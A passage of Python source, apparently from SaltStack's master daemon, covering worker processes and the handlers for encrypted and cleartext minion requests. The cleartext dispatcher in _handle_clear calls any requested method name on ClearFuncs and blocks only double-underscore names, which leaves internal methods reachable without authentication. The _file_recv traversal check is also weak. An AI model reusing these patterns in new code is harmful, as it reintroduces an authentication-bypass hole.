self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
:key dict: The user starting the server and the AES key
:mkey dict: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less then parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
'''
Calculate the master stats and fire events with stat info
'''
end = time.time()
duration = end - start
self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs']
if end - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = end
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool
:rtype: dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion pay
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
.. code-block:: bash
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
